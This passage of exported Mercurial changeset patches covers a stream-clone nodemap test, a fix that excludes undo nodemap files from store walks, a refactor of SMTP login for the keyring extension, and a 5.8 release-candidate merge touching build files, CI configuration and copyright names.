(known-bad-output pure !) + adding [s] 00changelog.d (368 KB) (zstd !) + adding [s] 00manifest.i (313 KB) + adding [s] 00changelog.i (313 KB) Check the result. $ f --size stream-clone-race-2/.hg/store/00changelog* - stream-clone-race-2/.hg/store/00changelog*: file not found (known-bad-output !) 
+ stream-clone-race-2/.hg/store/00changelog-*.nd: size=121344 (glob) (rust !) + stream-clone-race-2/.hg/store/00changelog-*.nd: size=121344 (glob) (pure !) + stream-clone-race-2/.hg/store/00changelog-*.nd: size=121152 (glob) (no-rust no-pure !) + stream-clone-race-2/.hg/store/00changelog.d: size=376950 (zstd !) + stream-clone-race-2/.hg/store/00changelog.d: size=368949 (no-zstd !) + stream-clone-race-2/.hg/store/00changelog.i: size=320448 + stream-clone-race-2/.hg/store/00changelog.n: size=70 $ hg -R stream-clone-race-2 debugnodemap --metadata | tee client-metadata-2.txt - abort: repository stream-clone-race-2 not found (known-bad-output !) + uid: * (glob) + tip-rev: 5006 + tip-node: ed2ec1eef9aa2a0ec5057c51483bc148d03e810b + data-length: 121344 (rust !) + data-unused: 192 (rust !) + data-unused: 0.158% (rust !) + data-length: 121152 (no-rust no-pure !) + data-unused: 0 (no-rust no-pure !) + data-unused: 0.000% (no-rust no-pure !) + data-length: 121344 (pure !) + data-unused: 192 (pure !) + data-unused: 0.158% (pure !) We get a usable nodemap, so no rewrite would be needed and the metadata should be identical (ie: the following diff should be empty) +This isn't the case for the `no-rust` `no-pure` implementation as it uses a very minimal nodemap implementation that unconditionally rewrites the nodemap "all the time". + +#if no-rust no-pure $ diff -u server-metadata-2.txt client-metadata-2.txt - --- server-metadata-2.txt * (glob) (known-bad-output !) - +++ client-metadata-2.txt * (glob) (known-bad-output !) - @@ -1,6 +0,0 @@ (known-bad-output !) - -uid: * (glob) (known-bad-output !) - -tip-rev: 5006 (known-bad-output !) - -tip-node: ed2ec1eef9aa2a0ec5057c51483bc148d03e810b (known-bad-output !) - -data-length: 121344 (known-bad-output rust !) - -data-unused: 192 (known-bad-output rust !) - -data-unused: 0.158% (known-bad-output rust !) - -data-length: 121344 (known-bad-output pure !) - -data-unused: 192 (known-bad-output pure !)
- -data-unused: 0.158% (known-bad-output pure !) - -data-length: 121152 (known-bad-output no-rust no-pure !) - -data-unused: 0 (known-bad-output no-rust no-pure !) - -data-unused: 0.000% (known-bad-output no-rust no-pure !) + --- server-metadata-2.txt * (glob) + +++ client-metadata-2.txt * (glob) + @@ -1,4 +1,4 @@ + -uid: * (glob) + +uid: * (glob) + tip-rev: 5006 + tip-node: ed2ec1eef9aa2a0ec5057c51483bc148d03e810b + data-length: 121152 [1] +#else + $ diff -u server-metadata-2.txt client-metadata-2.txt +#endif Clean up after the test # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618885623 -7200 # Tue Apr 20 04:27:03 2021 +0200 # Node ID 0b569c75d1808f05056e3e779993186ceded830f # Parent aed6ceaad6d7f4de350550c7486758ea1290d09d store: exclude `undo.` nodemap's file from `walk` There are "temporary" local files that should not be transferred by `walk` users like local clone and stream clone. This fixes the small issue that the new tests highlighted. Differential Revision: https://phab.mercurial-scm.org/D10482 diff --git a/mercurial/store.py b/mercurial/store.py --- a/mercurial/store.py +++ b/mercurial/store.py @@ -10,6 +10,7 @@ import errno import functools import os +import re import stat from .i18n import _ @@ -395,6 +396,9 @@ # deleted.
REVLOG_FILES_VOLATILE_EXT = (b'.n', b'.nd') +# some exception to the above matching +EXCLUDED = re.compile(b'.*undo\.[^/]+\.nd?$') + def is_revlog(f, kind, st): if kind != stat.S_IFREG: @@ -405,7 +409,7 @@ def revlog_type(f): if f.endswith(REVLOG_FILES_MAIN_EXT): return FILEFLAGS_REVLOG_MAIN - elif f.endswith(REVLOG_FILES_OTHER_EXT): + elif f.endswith(REVLOG_FILES_OTHER_EXT) and EXCLUDED.match(f) is None: t = FILETYPE_FILELOG_OTHER if f.endswith(REVLOG_FILES_VOLATILE_EXT): t |= FILEFLAGS_VOLATILE diff --git a/tests/test-persistent-nodemap.t b/tests/test-persistent-nodemap.t --- a/tests/test-persistent-nodemap.t +++ b/tests/test-persistent-nodemap.t @@ -988,8 +988,6 @@ $ touch $HG_TEST_STREAM_WALKED_FILE_2 $ $RUNTESTDIR/testlib/wait-on-file 10 $HG_TEST_STREAM_WALKED_FILE_3 $ cat clone-output-2 - adding [s] undo.backup.00manifest.n (70 bytes) (known-bad-output !) - adding [s] undo.backup.00changelog.n (70 bytes) (known-bad-output !) adding [s] 00manifest.n (70 bytes) adding [s] 00manifest-*.nd (118 KB) (glob) adding [s] 00changelog.n (70 bytes) # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1618867617 14400 # Mon Apr 19 17:26:57 2021 -0400 # Node ID 83c0d144ef8d929de662dc5cbdead4127251c35c # Parent 0b569c75d1808f05056e3e779993186ceded830f mail: split out the SMTP login to allow the keyring extension to wrap it The keyring extension only needs to tweak this tiny section of the larger function. But without any place to intercept the username/password fetching, it copy/pasted the entire function, and has grown a bunch of compatibility hacks to support older versions of Mercurial as well. 
Differential Revision: https://phab.mercurial-scm.org/D10471 diff --git a/mercurial/mail.py b/mercurial/mail.py --- a/mercurial/mail.py +++ b/mercurial/mail.py @@ -151,6 +151,32 @@ if starttls or smtps: ui.note(_(b'(verifying remote certificate)\n')) sslutil.validatesocket(s.sock) + + try: + _smtp_login(ui, s, mailhost, mailport) + except smtplib.SMTPException as inst: + raise error.Abort(stringutil.forcebytestr(inst)) + + def send(sender, recipients, msg): + try: + return s.sendmail(sender, recipients, msg) + except smtplib.SMTPRecipientsRefused as inst: + recipients = [r[1] for r in inst.recipients.values()] + raise error.Abort(b'\n' + b'\n'.join(recipients)) + except smtplib.SMTPException as inst: + raise error.Abort(inst) + + return send + + +def _smtp_login(ui, smtp, mailhost, mailport): + """A hook for the keyring extension to perform the actual SMTP login. + + An already connected SMTP object of the proper type is provided, based on + the current configuration. The host and port to which the connection was + established are provided for accessibility, since the SMTP object doesn't + provide an accessor. ``smtplib.SMTPException`` is raised on error. 
+ """ username = ui.config(b'smtp', b'username') password = ui.config(b'smtp', b'password') if username: @@ -163,21 +189,7 @@ if username and password: ui.note(_(b'(authenticating to mail server as %s)\n') % username) username = encoding.strfromlocal(username) - try: - s.login(username, password) - except smtplib.SMTPException as inst: - raise error.Abort(stringutil.forcebytestr(inst)) - - def send(sender, recipients, msg): - try: - return s.sendmail(sender, recipients, msg) - except smtplib.SMTPRecipientsRefused as inst: - recipients = [r[1] for r in inst.recipients.values()] - raise error.Abort(b'\n' + b'\n'.join(recipients)) - except smtplib.SMTPException as inst: - raise error.Abort(inst) - - return send + smtp.login(username, password) def _sendmail(ui, sender, recipients, msg): # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1618879132 14400 # Mon Apr 19 20:38:52 2021 -0400 # Node ID 5fa019ceb49950dccd1bb28dc4a16f657a083e4c # Parent 83c0d144ef8d929de662dc5cbdead4127251c35c mail: force SMTPException to bytes before wrapping in error.Abort Pytype wasn't complaining about this for some reason, but PyCharm was and we already handle another instance of this exception the same way in this function. 
Differential Revision: https://phab.mercurial-scm.org/D10473 diff --git a/mercurial/mail.py b/mercurial/mail.py --- a/mercurial/mail.py +++ b/mercurial/mail.py @@ -164,7 +164,7 @@ recipients = [r[1] for r in inst.recipients.values()] raise error.Abort(b'\n' + b'\n'.join(recipients)) except smtplib.SMTPException as inst: - raise error.Abort(inst) + raise error.Abort(stringutil.forcebytestr(inst)) return send # HG changeset patch # User Augie Fackler <augie@google.com> # Date 1618930866 14400 # Tue Apr 20 11:01:06 2021 -0400 # Branch stable # Node ID f67b8946bb1b6cfa8328dbf8d6a9128b69ccdcb4 # Parent bc268ea9f9843d65586186c0c735001510dd1daf # Parent 5fa019ceb49950dccd1bb28dc4a16f657a083e4c merge: default into stable for 5.8 rc diff --git a/Makefile b/Makefile --- a/Makefile +++ b/Makefile @@ -68,6 +68,12 @@ build: $(PYTHON) setup.py $(PURE) build $(COMPILERFLAG) +build-chg: + make -C contrib/chg + +build-rhg: + (cd rust/rhg; cargo build --release) + wheel: FORCE_SETUPTOOLS=1 $(PYTHON) setup.py $(PURE) bdist_wheel $(COMPILERFLAG) @@ -96,6 +102,9 @@ install-bin: build $(PYTHON) setup.py $(PURE) install --root="$(DESTDIR)/" --prefix="$(PREFIX)" --force +install-chg: build-chg + make -C contrib/chg install PREFIX="$(PREFIX)" + install-doc: doc cd doc && $(MAKE) $(MFLAGS) install @@ -107,6 +116,9 @@ install-home-doc: doc cd doc && $(MAKE) $(MFLAGS) PREFIX="$(HOME)" install +install-rhg: build-rhg + install -m 755 rust/target/release/rhg "$(PREFIX)"/bin/ + MANIFEST-doc: $(MAKE) -C doc MANIFEST @@ -175,7 +187,7 @@ $(PYFILESCMD) | xargs \ xgettext --package-name "Mercurial" \ --msgid-bugs-address "<mercurial-devel@mercurial-scm.org>" \ - --copyright-holder "Matt Mackall <mpm@selenic.com> and others" \ + --copyright-holder "Olivia Mackall <olivia@selenic.com> and others" \ --from-code ISO-8859-1 --join --sort-by-file --add-comments=i18n: \ -d hg -p i18n -o hg.pot.tmp $(PYTHON) i18n/posplit i18n/hg.pot.tmp diff --git a/README.rst b/README.rst --- a/README.rst +++ b/README.rst 
@@ -18,3 +18,13 @@ See https://mercurial-scm.org/ for detailed installation instructions, platform-specific notes, and Mercurial user information. + +Notes for packagers +=================== + +Mercurial ships a copy of the python-zstandard sources. This is used to +provide support for zstd compression and decompression functionality. The +module is not intended to be replaced by the plain python-zstandard nor +is it intended to use a system zstd library. Patches can result in hard +to diagnose errors and are explicitly discouraged as unsupported +configuration. diff --git a/black.toml b/black.toml deleted file mode 100644 --- a/black.toml +++ /dev/null @@ -1,14 +0,0 @@ -[tool.black] -line-length = 80 -exclude = ''' -build/ -| wheelhouse/ -| dist/ -| packages/ -| \.hg/ -| \.mypy_cache/ -| \.venv/ -| mercurial/thirdparty/ -''' -skip-string-normalization = true -quiet = true diff --git a/contrib/all-revsets.txt b/contrib/all-revsets.txt --- a/contrib/all-revsets.txt +++ b/contrib/all-revsets.txt @@ -46,8 +46,8 @@ # Used in revision c1546d7400ef min(0::) # Used in revision 546fa6576815 -author(lmoscovicz) or author(mpm) -author(mpm) or author(lmoscovicz) +author(lmoscovicz) or author(olivia) +author(olivia) or author(lmoscovicz) # Used in revision 9bfe68357c01 public() and id("d82e2223f132") # Used in revision ba89f7b542c9 @@ -100,7 +100,7 @@ draft() and ::tip ::tip and draft() author(lmoscovicz) -author(mpm) +author(olivia) ::p1(p1(tip)):: public() :10000 and public() @@ -130,7 +130,7 @@ head() head() - public() draft() and head() -head() and author("mpm") +head() and author("olivia") # testing the mutable phases set draft() diff --git a/contrib/base-revsets.txt b/contrib/base-revsets.txt --- a/contrib/base-revsets.txt +++ b/contrib/base-revsets.txt @@ -25,9 +25,9 @@ 0::tip roots(0::tip) author(lmoscovicz) -author(mpm) -author(lmoscovicz) or author(mpm) -author(mpm) or author(lmoscovicz) +author(olivia) +author(lmoscovicz) or author(olivia) +author(olivia) or 
author(lmoscovicz) tip:0 0:: # those two `roots(...)` inputs are close to what phase movement use. diff --git a/contrib/check-code.py b/contrib/check-code.py --- a/contrib/check-code.py +++ b/contrib/check-code.py @@ -2,7 +2,7 @@ # # check-code - a style and portability checker for Mercurial # -# Copyright 2010 Matt Mackall <mpm@selenic.com> +# Copyright 2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/contrib/check-commit b/contrib/check-commit --- a/contrib/check-commit +++ b/contrib/check-commit @@ -1,6 +1,6 @@ #!/usr/bin/env python3 # -# Copyright 2014 Matt Mackall <mpm@selenic.com> +# Copyright 2014 Olivia Mackall <olivia@selenic.com> # # A tool/hook to run basic sanity checks on commits/patches for # submission to Mercurial. Install by adding the following to your diff --git a/contrib/check-config.py b/contrib/check-config.py --- a/contrib/check-config.py +++ b/contrib/check-config.py @@ -2,7 +2,7 @@ # # check-config - a config flag documentation checker for Mercurial # -# Copyright 2015 Matt Mackall <mpm@selenic.com> +# Copyright 2015 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/contrib/chg/chg.1 b/contrib/chg/chg.1 --- a/contrib/chg/chg.1 +++ b/contrib/chg/chg.1 @@ -36,6 +36,6 @@ .B \-\-kill\-chg\-daemon Terminate the background command servers. .SH SEE ALSO -.BR hg (1), +.BR hg (1) .SH AUTHOR Written by Yuya Nishihara <yuya@tcha.org>. 
diff --git a/contrib/clang-format-ignorelist b/contrib/clang-format-ignorelist --- a/contrib/clang-format-ignorelist +++ b/contrib/clang-format-ignorelist @@ -9,3 +9,4 @@ hgext/fsmonitor/pywatchman/**.c mercurial/thirdparty/**.c mercurial/thirdparty/**.h +mercurial/pythoncapi_compat.h diff --git a/contrib/examples/fix.hgrc b/contrib/examples/fix.hgrc --- a/contrib/examples/fix.hgrc +++ b/contrib/examples/fix.hgrc @@ -5,7 +5,7 @@ rustfmt:command = rustfmt +nightly rustfmt:pattern = set:"**.rs" - "mercurial/thirdparty/**" -black:command = black --config=black.toml - +black:command = black --config=pyproject.toml - black:pattern = set:**.py - mercurial/thirdparty/** # Mercurial doesn't have any Go code, but if we did this is how we diff --git a/contrib/fuzz/Makefile b/contrib/fuzz/Makefile --- a/contrib/fuzz/Makefile +++ b/contrib/fuzz/Makefile @@ -1,5 +1,5 @@ -CC = clang -CXX = clang++ +CC ?= clang +CXX ?= clang++ # By default, use our own standalone_fuzz_target_runner. # This runner does no fuzzing, but simply executes the inputs @@ -10,6 +10,15 @@ # OSS-Fuzz will define its own value for LIB_FUZZING_ENGINE. LIB_FUZZING_ENGINE ?= standalone_fuzz_target_runner.o +# Default to Python 3. +# +# Windows ships Python 3 as `python.exe`, which may not be on PATH. py.exe is. 
+ifeq ($(OS),Windows_NT) +PYTHON?=py -3 +else +PYTHON?=python3 +endif + PYTHON_CONFIG ?= $$OUT/sanpy/bin/python-config PYTHON_CONFIG_FLAGS ?= --ldflags --embed @@ -20,7 +29,7 @@ standalone_fuzz_target_runner.o: standalone_fuzz_target_runner.cc $$OUT/%_fuzzer_seed_corpus.zip: %_corpus.py - python $< $@ + $(PYTHON) $< $@ pyutil.o: pyutil.cc pyutil.h $(CXX) $(CXXFLAGS) -g -O1 \ diff --git a/contrib/heptapod-ci.yml b/contrib/heptapod-ci.yml --- a/contrib/heptapod-ci.yml +++ b/contrib/heptapod-ci.yml @@ -7,6 +7,8 @@ variables: PYTHON: python TEST_HGMODULEPOLICY: "allow" + HG_CI_IMAGE_TAG: "latest" + TEST_HGTESTS_ALLOW_NETIO: "0" .runtests_template: &runtests stage: tests @@ -17,21 +19,12 @@ - hg -R /tmp/mercurial-ci/ update `hg log --rev '.' --template '{node}'` - cd /tmp/mercurial-ci/ - ls -1 tests/test-check-*.* > /tmp/check-tests.txt + - black --version + - clang-format --version script: - echo "python used, $PYTHON" - echo "$RUNTEST_ARGS" - - HGMODULEPOLICY="$TEST_HGMODULEPOLICY" "$PYTHON" tests/run-tests.py --color=always $RUNTEST_ARGS - - -.rust_template: &rust - before_script: - - hg clone . /tmp/mercurial-ci/ --noupdate --config phases.publish=no - - hg -R /tmp/mercurial-ci/ update `hg log --rev '.' 
--template '{node}'` - - ls -1 tests/test-check-*.* > /tmp/check-tests.txt - - cd /tmp/mercurial-ci/rust/rhg - - cargo build - - cd /tmp/mercurial-ci/ - + - HGTESTS_ALLOW_NETIO="$TEST_HGTESTS_ALLOW_NETIO" HGMODULEPOLICY="$TEST_HGMODULEPOLICY" "$PYTHON" tests/run-tests.py --color=always $RUNTEST_ARGS checks-py2: <<: *runtests @@ -58,14 +51,23 @@ phabricator-refresh: stage: phabricator + variables: + DEFAULT_COMMENT: ":white_check_mark: refresh by Heptapod after a successful CI run (:octopus: :green_heart:)" + STABLE_COMMENT: ":white_check_mark: refresh by Heptapod after a successful CI run (:octopus: :green_heart:)\n⚠ This patch is intended for stable ⚠\n{image https://media.giphy.com/media/nYI8SmmChYXK0/source.gif}" script: - - "./contrib/phab-refresh-stack.sh --comment \":white_check_mark: refresh by Heptapod after a successful CI run (:octopus: :green_heart:)\"" + - | + if [ `hg branch` == "stable" ]; then + ./contrib/phab-refresh-stack.sh --comment "$STABLE_COMMENT"; + else + ./contrib/phab-refresh-stack.sh --comment "$DEFAULT_COMMENT"; + fi test-py2: <<: *runtests variables: RUNTEST_ARGS: " --no-rust --blacklist /tmp/check-tests.txt" TEST_HGMODULEPOLICY: "c" + TEST_HGTESTS_ALLOW_NETIO: "1" test-py3: <<: *runtests @@ -73,6 +75,7 @@ RUNTEST_ARGS: " --no-rust --blacklist /tmp/check-tests.txt" PYTHON: python3 TEST_HGMODULEPOLICY: "c" + TEST_HGTESTS_ALLOW_NETIO: "1" test-py2-pure: <<: *runtests @@ -89,7 +92,6 @@ test-py2-rust: <<: *runtests - <<: *rust variables: HGWITHRUSTEXT: cpython RUNTEST_ARGS: "--rust --blacklist /tmp/check-tests.txt" @@ -97,13 +99,20 @@ test-py3-rust: <<: *runtests - <<: *rust variables: HGWITHRUSTEXT: cpython RUNTEST_ARGS: "--rust --blacklist /tmp/check-tests.txt" PYTHON: python3 TEST_HGMODULEPOLICY: "rust+c" +test-py3-rhg: + <<: *runtests + variables: + HGWITHRUSTEXT: cpython + RUNTEST_ARGS: "--rust --rhg --blacklist /tmp/check-tests.txt" + PYTHON: python3 + TEST_HGMODULEPOLICY: "rust+c" + test-py2-chg: <<: *runtests variables: diff --git 
a/contrib/hg-test-mode.el b/contrib/hg-test-mode.el --- a/contrib/hg-test-mode.el +++ b/contrib/hg-test-mode.el @@ -1,6 +1,6 @@ ;; hg-test-mode.el - Major mode for editing Mercurial tests ;; -;; Copyright 2014 Matt Mackall <mpm@selenic.com> +;; Copyright 2014 Olivia Mackall <olivia@selenic.com> ;; "I have no idea what I'm doing" ;; ;; This software may be used and distributed according to the terms of the diff --git a/contrib/hgperf b/contrib/hgperf --- a/contrib/hgperf +++ b/contrib/hgperf @@ -2,7 +2,7 @@ # # hgperf - measure performance of Mercurial commands # -# Copyright 2014 Matt Mackall <mpm@selenic.com> +# Copyright 2014 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/contrib/logo-droplets.svg b/contrib/logo-droplets.svg --- a/contrib/logo-droplets.svg +++ b/contrib/logo-droplets.svg @@ -1,5 +1,5 @@ <?xml version="1.0" encoding="UTF-8" standalone="no"?> <!-- Created with Inkscape (http://www.inkscape.org/) --> -<svg id="Layer_1" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns="http://www.w3.org/2000/svg" xml:space="preserve" height="120" width="100" version="1.0" xmlns:cc="http://web.resource.org/cc/" xmlns:dc="http://purl.org/dc/elements/1.1/" viewBox="0 0 124.766 152.099"><metadata id="metadata6845"><rdf:RDF><cc:Work rdf:about=""><dc:format>image/svg+xml</dc:format><dc:type rdf:resource="http://purl.org/dc/dcmitype/StillImage"/><dc:title>Mercurial "droplets" logo</dc:title><dc:creator><cc:Agent><dc:title>Cali Mastny and Matt Mackall</dc:title></cc:Agent></dc:creator><cc:license rdf:resource="http://creativecommons.org/licenses/GPL/2.0/"/><dc:date>Feb 12 2008</dc:date></cc:Work><cc:License rdf:about="http://creativecommons.org/licenses/GPL/2.0/"><cc:permits rdf:resource="http://web.resource.org/cc/Reproduction"/><cc:permits rdf:resource="http://web.resource.org/cc/Distribution"/><cc:requires 
rdf:resource="http://web.resource.org/cc/Notice"/><cc:permits rdf:resource="http://web.resource.org/cc/DerivativeWorks"/><cc:requires rdf:resource="http://web.resource.org/cc/ShareAlike"/><cc:requires rdf:resource="http://web.resource.org/cc/SourceCode"/></cc:License></rdf:RDF></metadata> +<svg id="Layer_1" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns="http://www.w3.org/2000/svg" xml:space="preserve" height="120" width="100" version="1.0" xmlns:cc="http://web.resource.org/cc/" xmlns:dc="http://purl.org/dc/elements/1.1/" viewBox="0 0 124.766 152.099"><metadata id="metadata6845"><rdf:RDF><cc:Work rdf:about=""><dc:format>image/svg+xml</dc:format><dc:type rdf:resource="http://purl.org/dc/dcmitype/StillImage"/><dc:title>Mercurial "droplets" logo</dc:title><dc:creator><cc:Agent><dc:title>Cali Mastny and Olivia Mackall</dc:title></cc:Agent></dc:creator><cc:license rdf:resource="http://creativecommons.org/licenses/GPL/2.0/"/><dc:date>Feb 12 2008</dc:date></cc:Work><cc:License rdf:about="http://creativecommons.org/licenses/GPL/2.0/"><cc:permits rdf:resource="http://web.resource.org/cc/Reproduction"/><cc:permits rdf:resource="http://web.resource.org/cc/Distribution"/><cc:requires rdf:resource="http://web.resource.org/cc/Notice"/><cc:permits rdf:resource="http://web.resource.org/cc/DerivativeWorks"/><cc:requires rdf:resource="http://web.resource.org/cc/ShareAlike"/><cc:requires rdf:resource="http://web.resource.org/cc/SourceCode"/></cc:License></rdf:RDF></metadata> <rect id="rect6847" stroke-linejoin="miter" style="stroke-dasharray:none;" height="150.12" width="124.77" stroke="#000" stroke-miterlimit="4" y="0.98776" x="0.3169" stroke-width="1.9755" fill="#FFF"/><path id="text2611" style="stroke-dasharray:none;" 
d="M9.848,124.61c1.777-0.79,3.665-1.18,5.479-1.18,1.74,0,2.851,0.43,3.48,1.32,1.332-0.89,3.146-1.32,4.553-1.32,4.221,0,4.369,1.71,4.369,6.73v11.11c0,0.49,0.074,0.49-2.036,0.49v-11.81c0-3.63-0.074-4.74-2.48-4.74-1.073,0-2.184,0.25-3.369,1.03v15.27c-0.037,0.15-0.111,0.18-0.369,0.22-0.038,0-0.074,0.03-0.112,0.03h-1.555v-11.81c0-3.49,0-4.77-2.517-4.77-1.074,0-2.147,0.21-3.406,0.82v15.27c0,0.49,0.074,0.49-2.0361,0.49v-17.15m27.831-1.18c-3.146,0-6.626,0.89-6.626,10.4,0,7.33,2.554,8.47,6.071,8.47,2.701,0,5.034-0.89,5.034-1.32,0-0.53-0.074-1.35-0.259-1.82-1.148,0.79-2.777,1.21-4.59,1.21-2.48,0-4.146-0.71-4.184-6.22,1.629,0,5.776-0.04,8.848-0.65,0.259-1.17,0.37-2.88,0.37-4.37,0-3.56-1.444-5.7-4.664-5.7m-0.185,1.78c2.221,0,2.813,1.46,2.85,4.31,0,0.75-0.037,1.64-0.148,2.49-2.073,0.5-5.591,0.5-7.072,0.5,0.261-6.48,2.481-7.3,4.37-7.3m8.07-0.21c1.739-1.14,3.332-1.57,4.961-1.57,1.814,0,2.666,0.5,2.666,1.11,0,0.35-0.112,0.96-0.297,1.31-0.519-0.28-1.11-0.53-2.074-0.53-1.184,0-2.295,0.32-3.183,1.1v14.85c0,0.49,0.037,0.49-2.073,0.49v-16.76m18.69-0.39c0-0.47-1.554-1.18-3.11-1.18-2.999,0-6.664,1.03-6.664,9.83,0,8.33,2.222,9.07,6.109,9.07,1.924,0,3.665-1.03,3.665-1.6,0-0.32-0.074-0.82-0.26-1.24-0.778,0.56-1.962,1.1-3.22,1.1-2.665,0-4.22-0.75-4.22-7.23,0-7.15,2.554-8.15,4.775-8.15,1.258,0,1.962,0.36,2.665,0.82,0.186-0.43,0.26-1.03,0.26-1.42m14.181,16.55c-1.63,0.82-3.776,1.14-5.627,1.14-4.739,0-5.442-1.99-5.442-6.73v-11.14c0-0.46-0.037-0.46,2.074-0.46v11.82c0,3.56,0.517,4.77,3.294,4.77,1.073,0,2.554-0.22,3.665-0.86v-15.27c0-0.46-0.074-0.46,2.036-0.46v17.19m4.221-16.16c1.739-1.14,3.332-1.57,4.96-1.57,1.814,0,2.666,0.5,2.666,1.11,0,0.35-0.111,0.96-0.296,1.31-0.519-0.28-1.111-0.53-2.074-0.53-1.184,0-2.295,0.32-3.183,1.1v14.85c0,0.49,0.037,0.49-2.073,0.49v-16.76m12.379-1.03c-1.629,0-2.11,0-2.11,0.96v16.83c2.073,0,2.11,0,2.11-0.49v-17.3m-2.184-6.27c0,1.18,0.37,1.6,1.11,1.64,0.851,0,1.259-0.61,1.259-1.67,0.037-1.11-0.26-1.61-1.111-1.61-0.814,0-1.221,0.61-1.258,1.64m5.696,7.3c0-0.39,0.074-0.61,0.
222-0.71,0.704-0.39,3.41-0.86,6.48-0.86,2.33,0,3.81,1.11,3.81,4.31v2.31c0,6.34-0.18,11.07-0.18,11.07-0.85,0.47-2.45,1.18-5.04,1.18-2.66,0.03-5.329-0.22-5.329-5.48,0-5.02,2.739-5.81,5.479-5.81,1.04,0,2.26,0.11,3.07,0.43v-3.31c0-2.31-1.18-2.81-2.59-2.81-1.89,0-4.514,0.35-5.662,0.89-0.222-0.39-0.26-1-0.26-1.21m8.512,7.9c-0.7-0.25-1.7-0.35-2.4-0.35-2.11,0-4.04,0.42-4.04,4.34,0,3.66,1.59,3.7,3.48,3.7,1.19,0,2.37-0.32,2.78-0.75,0,0,0.18-4.27,0.18-6.94m7.86,8.37c0,0.49,0.04,0.49-2.04,0.49v-25.2c0-0.96,0.41-0.96,2.04-0.96v25.67" stroke-miterlimit="4" stroke-width="2.02999997" fill="#010101"/><g id="g4503" transform="matrix(0.9351326,0,0,0.9351326,150.39508,-1.251766)"><path id="path2339" fill="#1b1a1b" d="M-45.75,92.692c20.04-33.321-4.232-87.363-48.614-81.873-40.096,4.958-40.746,47.165-5.405,57.191,30.583,8.685,6.318,28.084,7.027,41,0.712,12.92,26.587,17.6,46.992-16.318z"/><circle id="circle2341" transform="matrix(1.0917947,-0.2858168,0.2858168,1.0917947,-180.30817,13.494135)" cy="85.364" cx="33.728" r="15.414" fill="#1b1a1b"/><path id="path2343" fill="#1b1a1b" d="M-140.06,48.936c-6.26,0.606-10.84,6.164-10.24,12.422,0.61,6.262,6.17,10.847,12.43,10.241,6.26-0.614,10.84-6.171,10.23-12.43-0.61-6.253-6.16-10.839-12.42-10.233z"/><path id="path2561" fill="#bfbfbf" d="M-44.993,91.34c20.041-33.321-4.231-87.363-48.613-81.873-40.104,4.9568-40.744,47.166-5.406,57.193,30.583,8.684,6.318,28.083,7.027,41,0.713,12.92,26.587,17.6,46.992-16.32z"/><path id="path2563" fill="#000" d="M-86.842,112.76c-1.215-1.97,0.642-4.16,2.551-3.99,3.039,0.26,9.655-0.04,14.876-3,13.043-7.39,33.114-42.966,23.019-65.405-4.519-10.044-6.72-12.92-11.374-17.833-0.95-1.002-0.405-0.948,0.238-0.609,2.517,1.321,6.94,6.437,11.477,14.765,7.664,14.069,7.267,30.795,4.416,41.287-1.986,7.299-8.825,23.815-18.842,30.955-10.039,7.15-21.785,11.26-26.361,3.83z"/><path id="path2565" fill="#000" 
d="M-95.93,66.591c-6.83-2.028-15.64-4.853-20.74-11.517-3.75-4.914-5.66-10.277-6.15-13.318-0.17-1.085-0.32-1.991-0.01-2.24,0.15-0.117,2.81,5.896,6.79,10.936,3.97,5.04,9.53,7.988,14.16,9.059,4.117,0.952,12.646,3.044,15.532,5.503,2.967,2.527,3.215,7.987,2.216,8.603-1.006,0.62-3.048-4.429-11.798-7.026z"/><path id="path2567" fill="#FFF" d="M-81.841,113.72c-0.132,1.57,1.665,1.87,4.083,1.51,3.099-0.46,5.72-0.81,9.287-2.6,4.835-2.42,9.728-5.89,13.312-10.57,10.692-13.945,14.478-30.45,13.895-32.824-0.195,1.961-2.776,12.253-8.679,21.532-7.582,11.922-13.079,18.262-25.758,21.342-3.529,0.86-5.967-0.45-6.14,1.61z"/><path id="path2569" fill="#FFF" d="M-109.96,59.479c1.44,1.225,4.4,2.857,10.223,4.767,7.031,2.305,10.455,4.304,11.888,5.262,1.52,1.018,2.483,3.288,2.578,1.272,0.099-2.019-1.145-3.755-3.921-4.675-1.878-0.624-5.038-2.109-8.067-2.707-1.946-0.384-5.111-1.146-7.831-1.978-1.48-0.457-3-1.258-4.87-1.941z"/><circle id="circle2577" transform="matrix(1.0917947,-0.2858168,0.2858168,1.0917947,-180.30817,13.494135)" cy="84.375" cx="34.681" r="15.414" fill="#bfbfbf"/><path id="path2579" fill="#000" d="M-128.68,108.38c13.53,12.54,33.894-4.69,24.93-19.897-1.01-1.708-2.32-3.009-1.89-1.7,2.87,8.747,0.22,15.667-4.72,19.227-4.85,3.5-11.51,4.09-16.84,1.32-1.57-0.81-2.22,0.37-1.48,1.05z"/><path id="path2585" fill="#FFF" d="M-118.07,110.95c1.73-0.36,11.75-2.95,14.1-11.194,0.73-2.569,0.86-2.053,0.66-0.661-1.06,7.105-7.78,12.345-13.49,12.545-1.16,0.12-2.68-0.39-1.27-0.69z"/><path id="path2589" fill="#bfbfbf" d="M-139.3,47.584c-6.26,0.605-10.84,6.164-10.24,12.422,0.61,6.261,6.17,10.847,12.43,10.241,6.25-0.614,10.84-6.173,10.23-12.431-0.61-6.254-6.17-10.838-12.42-10.232z"/><path id="path2591" fill="#000" d="M-144.47,67.571c0.07,0.805,1.17,1.838,2.9,2.312,1.49,0.408,5.32,1.45,10.25-1.658,4.92-3.108,5.49-11.421,3.25-13.865-0.69-1.239-1.59-2.14-0.88-0.164,1.81,4.99-1.7,9.659-4.74,11.82-3.03,2.162-6.88,1.139-8.45,0.66s-2.4,0.064-2.33,0.895z"/><path id="path2597" fill="#FFF" 
